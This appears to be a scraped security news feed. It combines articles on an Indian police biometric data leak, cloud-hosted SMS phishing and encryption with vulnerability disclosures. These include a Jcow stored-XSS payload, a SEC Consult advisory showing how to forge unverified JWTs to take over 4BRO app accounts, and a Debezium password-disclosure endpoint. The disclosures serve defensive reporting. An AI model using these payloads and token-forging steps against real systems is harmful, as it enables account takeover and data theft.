By Waqas
The records belonged to two separate India-based firms, ThoughtGreen Technologies and Timing Technologies. Both provide application development, RFID technology, and biometric verification services.
This is a post from HackRead.com Read the original post: Data Leak Exposes 500GB of Indian Police, Military Biometric Data

A massive data leak during the elections in India exposed the biometric information of millions. An unsecured database containing fingerprints and facial scans of police, military personnel, and civilians was leaked, sparking concerns about identity theft and election security.

A gigantic data leak involving the exposure of biometric data has hit Indian citizens at a time when the nation is participating in the general elections. The data leak raises questions about the vulnerable state of cybersecurity in India when researchers have already reported cyber attacks and data leaks to target elections

In the latest, a misconfigured non-password-protected database containing over 1.6 million documents was discovered by cybersecurity researcher Jeremiah Fowler who reported it to Website Planet.

The exposed files, around 1,661,59 files (496.4 GB) in total, contained sensitive biometric details like facial scan images, fingerprints, signatures, and identifying marks of police officers, military personnel, teachers, and even railway workers.

Moreover, crucial information like birth certificates, images, email addresses, employment applications, diplomas, certifications, and other education-related files were part of the exposed data.

The database comprised records from 2021-2024. Around 284,535 documents, categorized as Physical Efficiency Tests (PET) for police and law enforcement officers, contained signature images, PDF documents, mobile applications, and installation data, some stored in compressed .zip format.

One of the folders titled Facial Software Installation contained images and documents captured and transmitted through the application. Internal database names, login, and password information were also found in plain text.

The leaked files – Image credit: Jeremiah Fowler via Website Planet

****ThoughtGreen Technologies and Timing Technologies****

The records belonged to two separate India-based firms, ThoughtGreen Technologies and Timing Technologies. Both provide application development, RFID technology, and biometric verification services. It is unclear who among these firms owned the server, though.

Public access to this database was restricted the same day. However, the duration of the database’s exposure and potential unauthorized access to the biometric records remain unknown. An internal forensic audit can determine if any suspicious activity took place and whether the records were accessed by anyone else.

****Data Being Sold on Telegram****

In a research **report** shared with Hackread.com ahead of publishing on May 23, 2024, Fowler noted that this data might already be up for sale on a Telegram group, which could put millions at risk of a wide range of threats.

Biometric data, such as fingerprints, are unique identifiers tied to an individual’s identity, making them virtually impossible to change. This data could be used for numerous malicious purposes, including impersonation and identity theft.

****A Wake-Up Call?****

This data leak shows the ethical and regulatory challenges surrounding the collection, use, and storage of biometric data. **India passed a law in 2022** extending police powers to **collect biometric data** from convicted, arrested, or detained individuals.

This incident is a wake-up call for governments and private firms, emphasizing the need for stronger data security practices and clear regulations to protect the privacy and security of citizens.

1.  Threat Actors Selling 1.8TB Database of Indian Mobile Users
2.  Top ERP Firm Exposing Half a Million Indian Job Seekers Data
3.  Hacker Leaks 73M Records from Indian HDFC Bank Subsidiary
4.  Hundreds of Indians Rescued from Cambodian Cybercrime Gangs
5.  Indian ISP Hathway Data Breach: Hacker Leaks 4M Users, KYC Data

Data Leak Exposes 500GB of Indian Police, Military Biometric Data

Plus: US surveillance reportedly targets pro-Palestinian protesters, the FBI arrests a man for AI-generated CSAM, and stalkerware targets hotel computers.

Sex, drugs, and … Eventbrite? A WIRED investigation published this week uncovered a network of spammers and scammers pushing the illegal sale of controlled substances like Xanax and oxycodone, escort services, social media accounts, and personal information on the event management platform. Making matters worse, Eventbrite’s recommendation algorithm promoted posts for opioids alongside addiction recovery events. The good news is, the company appears to have removed most of the more than 7,400 illicit posts WIRED uncovered.

If you drive a Tesla Model 3, make sure to enable your PIN-to-drive feature or your car could be easily stolen within seconds. While the company has added new ultra-wideband radio tech to its keyless system, which can prevent “relay attacks,” researchers at Beijing-based security firm GoGoByte found that Model 3s (as well as other unnamed makes and models of vehicles) are still vulnerable. Relay attacks use inexpensive radios to transmit the signal from someone’s key fob or phone app that can then be used to unlock and start an impacted vehicle. Tesla says its adoption of ultra-wideband radio was not meant to stop relay attacks (even though it technically could), but it’s possible the automaker will add that protection in the future.

Police busting people for running illicit online markets is nearly as old a tale as the dark web itself. But this week’s takedown offered a new twist. The FBI recently arrested Lin Rui-siang, a 23-year-old accused of operating Incognito Market, which authorities claim facilitated $100 million in sales of narcotics on the dark web. US prosecutors claim Lin then extorted Incognito’s users by threatening to expose them unless they paid up. Curiously, Lin’s professional experience includes teaching police how to catch cybercriminals by tracing cryptocurrency on blockchains. If the US Justice Department is correct about his alleged involvement in Incognito Market, that would make him one of the most unusual cybercriminals we’ve ever encountered.

Leaks don’t just impact people on the wrong side of the law, of course. An unsecured database recently exposed biometric data of police officers in India, including face scans, fingerprints, and more. The incident reveals the dangers of collecting sensitive biometrics in the first place.

Finally, the saga of WikiLeaks founder Julian Assange inched forward again this week, with a British court ruling that he can appeal his extradition to the US, where he faces 18 charges under the Espionage Act for WikiLeaks’ publication of classified US military information. The judges said that Assange can appeal US prosecutors’ assurances about how his trial would be conducted and on First Amendment grounds. The appeals process will inevitably push back any final decision about his potential extradition for months.

But that’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

Following the trend of tech companies in the AI race throwing privacy and caution to the wind, Microsoft unveiled plans this week to launch a tool on its forthcoming Copilot+ PCs called Recall that takes screenshots of its customers’ computers every few seconds. Microsoft says the tool is meant to give people the ability to “find the content you have viewed on your device.” The company also claims to have a range of protections in place and says the images are only stored locally in an encrypted drive, but the response has been roundly negative nonetheless, with some watchdogs reportedly calling it a possible “privacy nightmare.” The company notes that an intruder would need a password and physical access to the device to view any of the screenshots, which should rule out the possibility of anyone with legal concerns ever adopting the system. Ironically, Recall’s description sounds eerily reminiscent of computer monitoring software the FBI has used in the past. Microsoft even acknowledges that the system takes no steps to redact passwords or financial information.

**US Surveillance Reportedly Targets Pro-Palestinian Protesters**

Federal authorities are reportedly working quietly to establish ties between antiwar demonstrators on US campuses and any foreign groups or individuals overseas, according to journalist Ken Klippenstein, formerly of the Intercept, who says the National Counterterrorism Center is at the center of the effort. Evidence of overseas ties would lend further ammunition to politicians, university officials, and police, who’ve widely claimed “outside agitators” are to blame for the demonstrations—an allegation that’s routinely lobbed at protesters in the United States, often meant to imply that the protesters themselves are dupes. Incidentally, authorities may also overcome constitutional hurdles to surveillance by establishing a foreign target to spy on; someone unprotected by the country’s Fourth Amendment. Republicans in Congress—representatives Mark Green and August Pfluger—have, meanwhile, asked the FBI and Department of Homeland Security to supply congressional committees with records about the government’s surveillance of the protesters, including any efforts to infiltrate them using “online covert employees or confidential human sources.”

**FBI Arrests Man for AI-Generated CSAM**

The FBI has nabbed a 42-year-old Wisconsin man for using Stable Diffusion, the text-to-image generative AI software, to manufacture child sexual abuse material. The man was reportedly caught with “thousands of realistic images” of children, some featuring them nude or partially clothed with men. Court records indicate the evidence includes more than 13,000 gen-AI images as well as the prompts he used to create the images. “Using AI to produce sexually explicit depictions of children is illegal, and the Justice Department will not hesitate to hold accountable those who possess, produce, or distribute AI-generated child sexual abuse material,” Nicole Argentieri, head of the Justice Department’s Criminal Division, says in a statement. The arrest is part of Project Safe Childhood, a collaboration between the government and corporations reportedly targeting online offenders.

**Stalkerware Targets US Hotel Computer Systems**

Security researchers this week disclosed to TechCrunch that they’d discovered consumer-grade spyware—often known as “stalkerware”—on the computers of “at least three” Wyndham hotels in the United States, potentially exposing travelers’ personal details. The stalkerware, called pcTattletale, can be installed on Android and Windows devices, giving whoever has control of the sneaky app the ability to access data on the targeted machine and monitor users’ activity. The presence of pcTattletale was discovered thanks to a security flaw in the spyware that exposed screenshots of infected machines to the open internet, according to the researchers. Although the researchers found pcTattletale on Wyndham computers, the hotel company says each of its locations are franchises, suggesting that the spyware infection could be limited to just a few locations.

Microsoft’s New Recall AI Tool May Be a ‘Privacy Nightmare’

Cybersecurity researchers have discovered a critical security flaw in an artificial intelligence (AI)-as-a-service provider Replicate that could have allowed threat actors to gain access to proprietary AI models and sensitive information.
"Exploitation of this vulnerability would have allowed unauthorized access to the AI prompts and results of all Replicate's platform customers,"

Experts Find Flaw in Replicate AI Service Exposing Customers' Models and Data

By Deeba Ahmed
Fake Cloud, Real Theft!
This is a post from HackRead.com Read the original post: Top Cloud Services Used for Malicious Website Redirects in SMS Scams

SMS scammers are using cloud storage from Google, Amazon, and IBM to trick you! Learn how they’re doing it and how to protect yourself from these sneaky cloud phishing scams.

The threat intelligence unit at Enea, a software security firm based in Stockholm, Sweden, has uncovered a concerning trend: cybercriminals are exploiting cloud systems to perpetrate SMS scams including Smishing or SMS phishing.

According to the investigation by the company’s threat intelligence team, cloud storage services like Amazon S3, Google Cloud Storage, Backblaze B2, and IBM Cloud Object Storage are being exploited to redirect users to malicious websites, stealing their information through SMS.

(Screenshot: Enea)

****How Cloud Storage is Exploited?****

Cloud storage allows organizations and individuals to store, access, and manage files, including static websites. However, cybercriminals have exploited this facility to host static websites with embedded spam URLs in their source code.

These URLs are distributed via authentic text messages, bypassing firewall restrictions. Mobile users click on links containing cloud platform domains, which direct them to the static website stored in the storage bucket, automatically forwarding or redirecting them without user awareness.

****The Scam: From SMS to Fake Websites****

According to Enea’s blog post that the company shared with Hackread.com ahead of publication on Thursday 23rd, 2024, the attackers prioritize two main objectives: delivering scam messages without network firewall detection and convincing end users to perceive the messages or links as trustworthy. 

The scam starts with a seemingly harmless text message (SMS). These messages often contain enticing offers or create a sense of urgency, tricking recipients into clicking a link. This link redirects them to a malicious website cleverly disguised as a legitimate one.

As per the research, Google Cloud Storage’s domain, “storage.googleapis.com,” is used by attackers to link to a static webpage hosted in a bucket on the platform. The spam website is loaded from that webpage using the “HTML meta refresh” method, a technique used in web development to automatically refresh or redirect a web page after a certain time period.

These fake websites, typically hosted on cloud storage buckets with names like “dfa-b.html” on Google Cloud Storage, aim to steal personal and financial information once users enter it. Users are directed to fraudulent websites offering gift cards to trick users into revealing personal and financial information. 

These SMS scammers have also been observed using links to static websites hosted on Amazon Web Services (AWS), IBM Cloud, and Blackblaze B2 Cloud.

Malicious text messages sent through popular cloud storage services (Screenshot: Enea)

****Mitigation Strategies****

Detecting and blocking URLs containing genuine Google Cloud Storage domains is challenging due to their association with legitimate domains from reputable companies. To protect yourself from cloud phishing scams, be cautious with suspicious SMS links, check website legitimacy before entering personal information, and enable multi-factor authentication (MFA) to add an extra layer of security.

1.  The Top 5 Cloud Vulnerabilities You Should Know Of
2.  Cloud security – An ongoing struggle to keep sensitive data safe
3.  New Vulnerability LeakyCLI Leaks AWS, Google Cloud Credentials
4.  Shadow IT: Personal GitHub Repos Expose Employee Cloud Secrets
5.  Dropbox Abused in New Phishing, Malspam Scam to Steal SaaS Logins

Top Cloud Services Used for Malicious Website Redirects in SMS Scams

By Uzair Amir
Is End-to-End Encryption (E2EE) a Myth? Traditional encryption has vulnerabilities. Fully Homomorphic Encryption (FHE) offers a new hope…
This is a post from HackRead.com Read the original post: How FHE Technology Is Making End-to-End Encryption a Reality

Is End-to-End Encryption (E2EE) a Myth? Traditional encryption has vulnerabilities. Fully Homomorphic Encryption (FHE) offers a new hope for truly secure messaging, cloud storage, and data analysis.

Encryption is like waterproofing: it needs to be all or not at all. Just as it makes no sense to waterproof a left shoe and leave the right unprotected, encrypting the consumer component of a messaging app is pointless if content can later be decrypted on cloud servers.

It’s called end-to-end encryption (E2EE) for a reason, but up until now many services claiming to utilize this technology have fallen woefully short. From an architectural perspective, E2EE is difficult to implement, particularly in applications that serve millions of users.

However, the emergence of a relatively new encryption technology is raising hope that E2EE may become a reality rather than an aspiration. Its name is Fully Homomorphic Encryption (FHE) and its unique design makes it ideally suited to services that are reliant on true end-to-end encryption.

**How End-to-End Encryption Works**

End-to-end encryption is a technology that’s meant to ensure that only users communicating with one another can read the messages. This could be two individuals chatting via a messaging application or it could be a business exchanging payment data with another entity such as a bank. Data is encrypted on the sender’s device and decrypted on the recipient’s device, preventing intermediaries, including service providers, from accessing the content.

This is achieved by using cryptographic keys that encode the message before transmitting it in encrypted form. The counterparty then decodes the message using its own cryptographic key in order to read its content. In addition to messaging apps such as Signal and Telegram, the technology is used by email providers, cloud storage services, and file-sharing platforms. It’s no exaggeration to say that E2EE is the backbone of the internet.

While E2EE can prove very effective at preventing third parties from intercepting messages, it is by no means bulletproof. Concerted attempts by adversaries, ranging from governments to state-sponsored hackers, to weaken encryption and introduce backdoors have resulted in many services that purport to use E2EE being vulnerable.

Critically, from the user’s perspective, there is no easy means of verifying whether encryption has been maintained throughout. As a result, individuals are compelled to take service providers at their word when they promise that messages are fully encrypted.

**How Encrypted Is Fully Encrypted?**

When a service claims to be end-to-end encrypted, it should be just that. In reality, implementations can differ wildly in terms of encryption strength. While it’s theoretically possible for users to check that the service they’re using is implementing robust encryption, it’s technically complex to do so, placing this ability beyond the reach of most users.

Telegram, for instance, allows users to verify that its open-source code is the same as that being used within its mobile applications and on desktop. However, this requires running a series of Terminal commands.

Telegram founder Pavel Durov has previously taken aim at other messaging applications, questioning the integrity of their E2EE. In his personal Telegram channel, he’s claimed: “An alarming number of important people I’ve spoken to remarked that their “private” Signal messages had been exploited against them in US courts or media. But whenever somebody raises doubt about their encryption, Signal’s typical response is “we are open source so anyone can verify that everything is all right”. That, however, is a trick.”

He then elaborates on the inability for users to verify that Signal’s Github code is the same as that running in the app. It should be noted that despite its claims to offer superior encryption, Telegram has also fielded accusations of weaknesses in its own E2EE implementation.

One of the challenges is that even when a service provider has implemented robust encryption, there is still the potential for messages to be deciphered. From weak key management to compromised devices due to malware, there’s a multitude of ways in which content can be accessed by adversaries. And when a key is compromised, unless the provider generates new keys for every session, it’s possible to decrypt the entire messaging history.

Finally, even when E2EE is working optimally, its implementation places additional computational demands on networks, resulting in increased latency and reduced performance, especially on devices with limited processing power or on blockchains where resources are capped. For this reason, E2EE is by no means impregnable. Can FHE solve some of these challenges, or will it run into the same problems that have weakened existing encryption protocols?

****FHE Meets E2EE****

One of the weak points with traditional E2EE is when it comes to decrypting the data: it’s here that there’s potential for a third party to gain access to it. FHE, in comparison, allows computation to be performed directly on encrypted data without decryption, ensuring that data remains protected throughout the entire process. This is its greatest attribute and the one that differentiates it from other encryption technologies.

It may be hard to visualize the benefit FHE brings to bear in this respect when considering a messaging application, in which the data must be decrypted before it can be read by the recipient. But consider another instance in which FHE proves superior at safeguarding data within E2EE systems: email. Here, FHE makes it possible for an email provider or cloud service to return results from an encrypted database without actually seeing the data.

This capability can also be extended to numerous other use cases in which data can be analyzed without disclosing its contents: analysts can run algorithms on encrypted datasets, with the results only decryptable by the intended recipient. Or machine learning models can be trained using encrypted data. This allows organizations to leverage powerful AI tools without compromising the privacy of the underlying data.

Within a blockchain context, fully homomorphic encryption also has significant potential, particularly in the construction of end-to-end encrypted applications for messaging or transmitting financial data. Fhenix, for example, is powered by fhEVM, a variation of the Ethereum Virtual Machine, that supports confidential smart contracts. As a result, confidential data can be analyzed and transmitted without its contents being disclosed.

Given that data remains encrypted at all stages with FHE – in transit, at rest, and during processing – it’s easy to see why developers are so excited about its potential for strengthening E2EE systems.

FHE can reduce the attack surface and ensure that sensitive data is never exposed to unauthorized parties, even during processing. This eliminates the need to trust service providers since they only handle encrypted data and mitigates the risks associated with data breaches. 

If FHE can achieve wider adoption, both in blockchain and traditional systems, end-to-end encryption may soon live up to its name, providing truly unbreakable data protection.

1.  WhatsApp Engineers Fear Encryption Flaw Exposes User Data
2.  8 tips to protect company data sent via home internet connections
3.  Signal, AI Generated Art Least, Amazon, Facebook Most Invasive Apps

How FHE Technology Is Making End-to-End Encryption a Reality

Jcow Social Networking versions 14.2 up to 16.2.1 suffer from a persistent cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: Jcow Social Networking 14.2 < 16.2.1 | Stored XSS # Date: 2024-05-23# Author: tmrswrr# Vendor Homepage: https://www.jcow.net/# Software Link: https://sourceforge.net/projects/jcow/# Tested : https://demo.jcow.net/# Version : 14.2 < 16.2.11) Login with any user Click invite place : https://127.0.0.1/Jcow/index.php?p=invite2) Write in To (Email address) field your payload : "><img src=x onerrora=confirm() onerror=confirm(1)>3) After Send invitations you will be see alert button

Jcow Social Network Cross Site Scripting

4BRO versions prior to 2024-04-17 suffer from insecure direct object reference and API information disclosure vulnerabilities.

    SEC Consult Vulnerability Lab Security Advisory < 20240522-0 >=======================================================================               title: Broken access control & API Information Exposure             product: 4BRO App  vulnerable version: before 2024-04-17       fixed version: 2024-04-17          CVE number: -              impact: Critical            homepage: https://www.4bro.de               found: 2023-05-07                  by: Max Rull (Office Bochum)                      SEC Consult Vulnerability Lab                      An integrated part of SEC Consult, an Eviden business                      Europe | Asia                      https://www.sec-consult.com=======================================================================Vendor description:-------------------"4BRO is a German company known for producing iced tea beverages. The brand offersa variety of flavors, including unique combinations such as peach, bubblegum,and watermelon mint. 4BRO emphasizes modern and appealing packaging, targetinga younger demographic. The company promotes its products through various platformsand incentivizes customer loyalty with their app, which allows users to collectpoints for rewards. The company's headquarters is located in Germany, and theirproducts are widely available both online and in retail stores."Source: https://www.4bro.deBusiness recommendation:------------------------The vendor has fixed the security issues in the API server as of 2024-04-17.SEC Consult highly recommends to perform a thorough security review of the productconducted by security professionals to identify and resolve potential furthersecurity issues.Vulnerability overview/description:-----------------------------------1) Broken access control via IDOR in 4BRO app APIAn IDOR vulnerability (Insecure Direct Object Reference) allows an attackerto change the username in the Bearer token used for authentication in the 4BRO app.This leads to account takeover as a result of broken access control (poor Bearertoken verification). Attackers are able to access all data or Bro points ("broins")from other users.2) API Information ExposureWhen opening the app as an unauthenticated user, the 4BRO app loads JSON datafrom a publicly available API endpoint containing sensitive data like e-mailaddresses of employees, internal invoices, a CV including personal information,a gift card etc.Proof of concept:-----------------1) Broken access control via IDOR in 4BRO app APIWhen logging in into the 4BRO app, the server returns a JWT (JSON Web Token).The "login" HTTP request looks like this:--------------------------------------------------------------------------------POST /api/user/signin HTTP/2Host: adminpanel.4bro.deContent-Type: application/json[...]{"email":"<login email>","password":"<login password>"}--------------------------------------------------------------------------------The server responds with a JWT used for authentication and additionalaccount-related data:--------------------------------------------------------------------------------HTTP/2 200 OKContent-Type: application/json; charset=utf-8[...]{     "token": "<JWT here>",     "userData": {         "isBlocked": false,         "_id": "[...]",         "userType": "USER",         "email": "<login email>",         "broins": 0,         "deviceId": null,         "userCreationDate": "2023-XX-XXTXX:XX:XX.XXXZ",         "address": [{                 "_id": "[...]",                 "streetName": "[...]",                 "streetNumber": "[...]",                 "postalcode": "[...]",                 "city": "[...]",                 "firstName": "[...]",                 "lastName": "[...]",                 "country": "at"             }         ],         "ratings": [],         "__v": 0,         "pushToken": "[...]",         "telekomUUID": "[...]"     }}--------------------------------------------------------------------------------Because the JWT is only base64-encoded, it is easy to decode the JWT'sheader and payload as clear text using JWT decoders like https://token.dev/:--------------------------------------------------------------------------------Header:{   "kid": "[...]",   "alg": "RS256"}--------------------------------------------------------------------------------Payload:{   "sub": "[...]",   "event_id": "[...]",   "token_use": "access",   "scope": "aws.cognito.signin.user.admin",   "auth_time": 1683565567,   "iss": "https://cognito-idp.eu-central-1.amazonaws.com/[...]",   "exp": 1683569167,   "iat": 1683565567,   "jti": "[...]",   "client_id": "[...]",   "username": "<login email>"}--------------------------------------------------------------------------------The payload of the JWT contains multiple values indicating that AWS Cognito is in use.By changing the "username" value of the JWT payload to a victim email, it is possibleto use the modified JWT for authenticating as the victim. The victim should alreadyhave a normally registered account in the 4BRO app. By trial and error, it turns outthat even the following modified JWT payload gets accepted by the server:--------------------------------------------------------------------------------{   "sub": "0",   "event_id": "0",   "token_use": "access",   "scope": "aws.cognito.signin.user.admin",   "auth_time": 0,   "iss": "",   "exp": 0,   "iat": 0,   "jti": "0",   "client_id": "0",   "username": "<login email>"}--------------------------------------------------------------------------------Meanwhile, the "kid" property in the JWT header must be a valid value, but can belongto any other already existing 4BRO app account. The JWT signature can be the sameand does not get verified at all.Using the modified JWT, all API methods supported by the 4BRO app can be executed.Because the server only checks the "username" property in the JWT payload and doesslim to none JWT verification, the server thinks that the request came from theaccount associated with the login email contained in the "username" property.This way, sensitive data such as the current "broin" balance, full user data as seenin the login response, previous transactions, redeemed vouchers and goodies etc.can be accessed without restrictions, using the 4BRO API. Also, the "sending broins"action can be performed so that earned "broins" could be transferred to an attacker'saccount balance.2) API Information ExposureBy monitoring the 4BRO app's requests over a proxy, it can be observed thatthe following HTTP request is made when opening the "Goodies" section of the app:--------------------------------------------------------------------------------GET /api/goodies?pageSize=1000 HTTP/2Host: adminpanel.4bro.de[...]--------------------------------------------------------------------------------The response is a JSON object containing all goodies that are or were at some pointavailable in the 4BRO app:--------------------------------------------------------------------------------HTTP/2 200 OKContent-Type: application/json; charset=utf-8Content-Length: 327138[...]{     "goodiesList": [{             "_id": "61950603005c650530b63aac",             "name": "1x 4BRO Getränk Imbiss",             "longDescription": "[...]",             "shortDescription": "Auf unseren Nacken!",             "imagePath":"https://broappasset-prod.s3.eu-central-1.amazonaws.com/dev/goodies/app_kachel_food_256x256.jpg",             "category": "Food",             "quantity": 999999999999808,             "costOfGoodie": 250,             "supplier": "<email removed>",             "totalGoodies": 999999999999861,             "goodieAvailableTime": "Unlimited",             "deliveryMethod": "partnerCoupon",             "isNewGoodie": false,             "inhouseAppVoucherUrl":"https://broappasset-prod.s3.eu-central-1.amazonaws.com/dev/inhouseAppVouchers/undefined",             "__v": 1,             "rating": {                 "value": 3.991869918699184,                 "total": 123             },             "forceGoodie": "true",             "goodieAvailableEndTime": null,             "goodieAvailableStartTime": null,             "restriction": [],             "hidden": false,             "slashedCostOfGoodie": null         },{    [...]    },    [...]    }     ],     "goodieCount": 371}--------------------------------------------------------------------------------This JSON object contains already sensitive data such as the goodie supplier's emailaddresses. Out of the 371 goodies, 36 of those have a URL to a PDF file containedwithin the "inhouseAppVoucherUrl" property. Because these files are hosted on anAWS S3 bucket, everyone can access these documents without authentication.These documents seem to contain various sensitive company internal and personalinformation.While discovering vulnerability 1), we found that old gift codes were also stored asPDF files on the AWS S3 bucket. The names of the gift code PDF files indicate thatthere may be more similarly named documents (IDOR) which could be detected in anautomated way. This could be leveraged to find additional gift code PDF files storedon the AWS S3 bucket.Vulnerable / tested versions:-----------------------------The following app version has been tested and downloaded through Google Play store,which was the most recent version available at the time of the test:* 3.14.7Because the vulnerability is actually server-side within the API, the iOS app wasalso affected at the time the vulnerabilities were discovered.Vendor contact timeline:------------------------2023-06-12: Contacting vendor through broservice@4bro.de (owner) and info@dev5310.com             (developers according to Google Play store)2023-06-15: Vendor asks about the risks of the identified vulnerabilities and which             parts of the application are affected and whether any costs would arise             before they provide us with a security contact.2023-06-16: Detailed answer regarding risk estimation, responsible disclosure and             that no costs are involved.2023-06-19: Vendor requests a phone conference, scheduled for 21st June.2023-06-21: Clarifying responsible disclosure, explaining vulnerabilities and next             steps in phone call. Providing security advisory to vendor.2023-06-29: Vendor has sent the advisory to the developer team for evaluation             and will notify SEC Consult about the release of the security patch.2023-08-18: Asking for a status update.2023-08-31: It is planned to release an Android/iOS app update end of September2023-09-18: Vendor needs to postpone update, no new date available.2023-11-08: Asking for a status update; no response.2023-11-21: Asking for a status update.2023-12-11: Vendor response, fix is available in test environment, production             will be fixed by end of this year.2024-01-24: Asking for a status update; no response.2024-02-12: Asking for a status update.2024-02-12: Vendor is still waiting for a response from their IT.2024-04-17: Asking for a status update.2024-04-17: Vendor states that the vulnerabilities have been fixed.2024-04-17: Asking for the fix date, whether an app update was needed for applying             the fix, and the fixed app version. No response.2024-05-13: Asking vendor again about fixed version, etc., setting preliminary release             date to 2024-05-21. No response.2024-05-22: Release of security advisorySolution:---------The vendor implemented a fix in the affected API server as of 2024-04-17.An app update on Android or iOS is not required to apply the fix.Workaround:-----------NoneAdvisory URL:-------------https://sec-consult.com/vulnerability-lab/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SEC Consult Vulnerability LabAn integrated part of SEC Consult, an Eviden businessEurope | AsiaAbout SEC Consult Vulnerability LabThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, anEviden business. It ensures the continued knowledge gain of SEC Consult in thefield of network and application security to stay ahead of the attacker. TheSEC Consult Vulnerability Lab supports high-quality penetration testing andthe evaluation of new offensive and defensive technologies for our customers.Hence our customers obtain the most current information about vulnerabilitiesand valid recommendation about the risk profile of new technologies.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Interested to work with the experts of SEC Consult?Send us your application https://sec-consult.com/career/Interested in improving your cyber security with the experts of SEC Consult?Contact our local offices https://sec-consult.com/contact/~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Mail: security-research at sec-consult dot comWeb: https://www.sec-consult.comBlog: https://blog.sec-consult.comTwitter: https://twitter.com/sec_consultEOF M. Rull / @2024

4BRO Insecure Direct Object Reference / API Information Exposure

Debezium UI version 2.5 suffers from a credential disclosure vulnerability.

    # Exploit Title: Debezium UI - Credential Leakage# Google Dork: N/A# Date: [2024-03-11]# Exploit Author: Ihsan Cetin, Hamza Kaya Toprak# Vendor Homepage: https://debezium.io/# Software Link: N/A# Version: < 2.5 (REQUIRED)# Tested on: [N/A]# CVE : CVE-2024-28736Proof of concept:# Details#Debezium-ui (version 2.5) is vulnerable to a password exposure issue that could allow an attacker to retrieve sensitive credentials in plaintext format.# PoC :#Unmasked Password in Connector Configuration: When navigating to the connectors section within the application's connector screen, the password field, which should ideally be masked for security purposes, is briefly displayed in plaintext format during the initial seconds.# Plaintext Password Retrieval via API Endpoint: By accessing the URLhttp://10.0.15.51:8080//api/connectors/1/account-activity/config#and searching for the database.password parameter, an attacker can retrieve the database password in plaintext format without any authentication.

Debezium UI 2.5 Credential Disclosure

Debian Linux Security Advisory 5695-1 - Manfred Paul discovered that an attacker with arbitrary read and write capability may be able to bypass Pointer Authentication in the WebKitGTK web engine.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5695-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
May 22, 2024                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2024-27834

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2024-27834

   Manfred Paul discovered that an attacker with arbitrary read and  
   write capability may be able to bypass Pointer Authentication.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 2.44.2-1~deb11u1.

For the stable distribution (bookworm), this problem has been fixed in  
version 2.44.2-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmZNsSQACgkQAAyEYu0C  
2AL2wxAAnx+ORCkML2MQZukV0lBt7yHzBHWaZHDWF8C3hbo8DPxqpNPGSRwpLb6M  
xzRbW+7LvdlQUuSEMs0ms00jh1wkmQh1cAa09n778+pYhu5oLm09HOU51ybWaWRM  
gojJiHC6svqhov5vxtqbSTUrpXzGQhp9ZYUAyCI49eJSzROIdk188CHHY1PxHZH1  
nwlQddTeaL63f+0nyXzHomFtgOhyA6ESmVgunS8/yoIxQUOn3T6MQOvdKlizMJAr  
watZ4fQq69AEqFMC2x8cCIZ6zZAhu4dLwagnundEdwZxeKRa6vAv6N5BLFx9lC8q  
HARmaMttDl1+3AMHwMiZDqdNt++L4Ldgy26PJQa8hsDlAmXQsR5qtR/xmS7+l6AN  
euXWeyF2DBM3GZgRzsACFJsnqYkQ9snQZdSYzHi2//xyskTpyHxYwMp/wFp4Kirt  
F05d66TocWkWviuYddytl0cRGb3X1I7pB+8vkw90ugIMJKFxh6cXDDPch6kTdMLg  
YPsSxV8/h1jcxr5MgST1LntvvhgGT70YV9HWJleQ33bmWqEQ6xF7vrIsKy3MiFx1  
jKGoI7GvgOrWRDUIZuw4680f9Hv4Cpz4R0uKMOS4wTbrEQkhv96E/sAcER8P9VYm  
9U6AuFAoA5KRU8BysUD3A/PzHo+wKwTSBUuKUGex8HnPIfmUEyw=  
=yLoR  
-----END PGP SIGNATURE-----

Debian Security Advisory 5695-1

Red Hat Security Advisory 2024-3354-03 - Red Hat Fuse 7.13.0 release is now available. The purpose of this text-only errata is to inform you about the security issues fixed in this release. Issues addressed include HTTP request smuggling, bypass, denial of service, deserialization, and traversal vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_3354.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat Fuse 7.13.0 release and security update  
Advisory ID:        RHSA-2024:3354-03  
Product:            Red Hat JBoss Fuse  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:3354  
Issue date:         2024-05-24  
Revision:           03  
CVE Names:          CVE-2022-41678  
====================================================================

Summary: 

Red Hat Fuse 7.13.0 release is now available. The purpose of this text-only errata is to inform you about the security issues fixed in this release.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat Fuse 7.13.0 is released which includes bug fixes and enhancements, which are documented in the Release Notes document linked in the References.

Security Fix(es):

* undertow: OutOfMemoryError due to @MultipartConfig handling (CVE-2023-3223)

* jetty-servlets: jetty: Improper addition of quotation marks to user inputs in CgiServlet (CVE-2023-36479)

